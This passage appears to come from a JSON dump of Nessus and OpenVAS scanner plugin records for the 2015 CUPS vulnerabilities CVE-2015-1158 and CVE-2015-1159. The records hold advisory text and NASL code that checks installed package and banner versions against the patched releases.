exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"cups-base<2.0.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:43:27", "description": "Two critical vulnerabilities have been found in the CUPS printing\nsystem :\n\nCVE-2015-1158 - Improper Update of Reference Count Cupsd uses\nreference-counted strings with global scope. When parsing a print job\nrequest, cupsd over-decrements the reference count for a string from\nthe request. As a result, an attacker can prematurely free an\narbitrary string of global scope. They can use this to dismantle\nACL’s protecting privileged operations, and upload a replacement\nconfiguration file, and subsequently run arbitrary code on a target\nmachine.\n\nThis bug is exploitable in default configurations, and does not\nrequire any special permissions other than the basic ability to print.\n\nCVE-2015-1159 - Cross-Site Scripting A cross-site scripting bug in the\nCUPS templating engine allows the above bug to be exploited when a\nuser browses the web. This XSS is reachable in the default\nconfiguration for Linux instances of CUPS, and allows an attacker to\nbypass default configuration settings that bind the CUPS scheduler to\nthe ‘localhost’ or loopback interface.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 14, "published": "2015-06-10T00:00:00", "title": "Debian DLA-239-1 : cups security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:libcupsdriver1", "p-cpe:/a:debian:debian_linux:cups-client", "p-cpe:/a:debian:debian_linux:cups", "p-cpe:/a:debian:debian_linux:libcupsimage2", "p-cpe:/a:debian:debian_linux:libcupsmime1", "p-cpe:/a:debian:debian_linux:libcupscgi1-dev", "p-cpe:/a:debian:debian_linux:libcups2", "p-cpe:/a:debian:debian_linux:libcupsppdc1", "p-cpe:/a:debian:debian_linux:cups-common", "p-cpe:/a:debian:debian_linux:libcups2-dev", "p-cpe:/a:debian:debian_linux:cups-ppdc", "p-cpe:/a:debian:debian_linux:cups-dbg", "p-cpe:/a:debian:debian_linux:libcupscgi1", "p-cpe:/a:debian:debian_linux:cupsddk", "p-cpe:/a:debian:debian_linux:libcupsdriver1-dev", "p-cpe:/a:debian:debian_linux:libcupsimage2-dev", "p-cpe:/a:debian:debian_linux:libcupsppdc1-dev", "p-cpe:/a:debian:debian_linux:cups-bsd", "p-cpe:/a:debian:debian_linux:libcupsmime1-dev"], "id": "DEBIAN_DLA-239.NASL", "href": "https://www.tenable.com/plugins/nessus/84061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-239-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84061);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098, 75106);\n\n script_name(english:\"Debian DLA-239-1 : cups security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two critical vulnerabilities have been found in the CUPS printing\nsystem :\n\nCVE-2015-1158 - Improper Update of Reference Count Cupsd uses\nreference-counted strings with global scope. When parsing a print job\nrequest, cupsd over-decrements the reference count for a string from\nthe request. As a result, an attacker can prematurely free an\narbitrary string of global scope. They can use this to dismantle\nACL’s protecting privileged operations, and upload a replacement\nconfiguration file, and subsequently run arbitrary code on a target\nmachine.\n\nThis bug is exploitable in default configurations, and does not\nrequire any special permissions other than the basic ability to print.\n\nCVE-2015-1159 - Cross-Site Scripting A cross-site scripting bug in the\nCUPS templating engine allows the above bug to be exploited when a\nuser browses the web. This XSS is reachable in the default\nconfiguration for Linux instances of CUPS, and allows an attacker to\nbypass default configuration settings that bind the CUPS scheduler to\nthe ‘localhost’ or loopback interface.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/06/msg00003.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/cups\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-bsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-ppdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cupsddk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcups2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcups2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupscgi1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupscgi1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsdriver1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsdriver1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsimage2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsimage2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsmime1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsmime1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsppdc1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsppdc1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"cups\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-bsd\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-client\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-common\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-dbg\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-ppdc\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cupsddk\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcups2\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcups2-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupscgi1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupscgi1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsdriver1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsdriver1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsimage2\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsimage2-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsmime1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsmime1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsppdc1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsppdc1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:38:28", "description": "According to its banner, the CUPS printer service running on the\nremote host is a version prior to 2.0.3. It is, therefore, potentially\naffected by the following vulnerabilities :\n\n - A privilege escalation vulnerability exists due to a\n flaw in cupsd when handling printer job request errors.\n An unauthenticated, remote attacker can exploit this,\n with a specially crafted request, to prematurely free an\n arbitrary string of global scope, creating a dangling\n pointer to a repurposed block of memory on the heap, \n resulting ACL verification to fail when parsing\n 'admin/conf' and 'admin' ACLs. This allows an attacker\n to upload a replacement CUPS configuration file.\n (CVE-2015-1158)\n\n - A cross-site scripting vulnerability exists due to\n improper sanitization of user-supplied input to the\n 'QUERY' parameter of the help page. This allows a remote\n attacker, with a specially crafted request, to execute\n arbitrary script code. (CVE-2015-1159)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "published": "2015-06-12T00:00:00", "title": "CUPS < 2.0.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:cups"], "id": "CUPS_2_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/84149", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84149);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098);\n script_xref(name:\"CERT\", value:\"810572\");\n\n script_name(english:\"CUPS < 2.0.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the CUPS server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote printer service is potentially affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the CUPS printer service running on the\nremote host is a version prior to 2.0.3. It is, therefore, potentially\naffected by the following vulnerabilities :\n\n - A privilege escalation vulnerability exists due to a\n flaw in cupsd when handling printer job request errors.\n An unauthenticated, remote attacker can exploit this,\n with a specially crafted request, to prematurely free an\n arbitrary string of global scope, creating a dangling\n pointer to a repurposed block of memory on the heap, \n resulting ACL verification to fail when parsing\n 'admin/conf' and 'admin' ACLs. This allows an attacker\n to upload a replacement CUPS configuration file.\n (CVE-2015-1158)\n\n - A cross-site scripting vulnerability exists due to\n improper sanitization of user-supplied input to the\n 'QUERY' parameter of the help page. This allows a remote\n attacker, with a specially crafted request, to execute\n arbitrary script code. (CVE-2015-1159)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cups.org/blog.php?L1082\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/apple/cups/issues/4609\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to CUPS version 2.0.3 or later. Alternatively, apply the patch\nprovided by the vendor.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1158\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:cups\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"cups_1_3_5.nasl\");\n script_require_keys(\"www/cups\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 631);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:631, embedded:TRUE);\nget_kb_item_or_exit(\"www/\"+port+\"/cups/running\");\n\nversion = get_kb_item_or_exit(\"cups/\"+port+\"/version\");\nsource = get_kb_item_or_exit(\"cups/\"+port+\"/source\");\n\nif (version =~ \"^(2|2\\.0)($|[^0-9br.])\") audit(AUDIT_VER_NOT_GRANULAR, \"CUPS\", port, version);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# Affected :\n# x.x.x < 2.0.3\nif (\n version =~ \"^1\\.\" ||\n version =~ \"^2\\.0\\.[0-2]($|[^0-9.])\" ||\n version =~ \"^2\\.0(rc|b)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 2.0.3' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"CUPS\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:13:51", "description": "This update fixed 2 security flaws.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2015-06-22T00:00:00", "title": "Fedora 21 : cups-1.7.5-17.fc21 (2015-9801)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-22T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:cups"], "id": "FEDORA_2015-9801.NASL", "href": "https://www.tenable.com/plugins/nessus/84311", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-9801.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84311);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"FEDORA\", value:\"2015-9801\");\n\n script_name(english:\"Fedora 21 : cups-1.7.5-17.fc21 (2015-9801)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixed 2 security flaws.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1221641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1221642\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160577.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dda586f0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"cups-1.7.5-17.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:28:53", "description": "It was discovered that CUPS incorrectly handled reference counting\nwhen handling localized strings. A remote attacker could use this\nissue to escalate permissions, upload a replacement CUPS configuration\nfile, and execute arbitrary code. (CVE-2015-1158)\n\nIt was discovered that the CUPS templating engine contained a\ncross-site scripting issue. A remote attacker could use this issue to\nbypass default configuration settings. (CVE-2015-1159).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2015-06-11T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 / 15.04 : cups vulnerabilities (USN-2629-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-11T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:canonical:ubuntu_linux:14.10", "p-cpe:/a:canonical:ubuntu_linux:cups", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2629-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84117", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2629-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84117);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098);\n script_xref(name:\"USN\", value:\"2629-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 / 15.04 : cups vulnerabilities (USN-2629-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that CUPS incorrectly handled reference counting\nwhen handling localized strings. A remote attacker could use this\nissue to escalate permissions, upload a replacement CUPS configuration\nfile, and execute arbitrary code. (CVE-2015-1158)\n\nIt was discovered that the CUPS templating engine contained a\ncross-site scripting issue. A remote attacker could use this issue to\nbypass default configuration settings. (CVE-2015-1159).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2629-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"cups\", pkgver:\"1.5.3-0ubuntu8.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"cups\", pkgver:\"1.7.2-0ubuntu1.6\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"cups\", pkgver:\"1.7.5-3ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"cups\", pkgver:\"2.0.2-1ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:36:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "Check the version of cups", "modified": "2019-03-08T00:00:00", "published": "2015-06-19T00:00:00", "id": "OPENVAS:1361412562310882201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882201", "type": "openvas", "title": "CentOS Update for cups CESA-2015:1123 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2015:1123 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882201\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-19 06:18:15 +0200 (Fri, 19 Jun 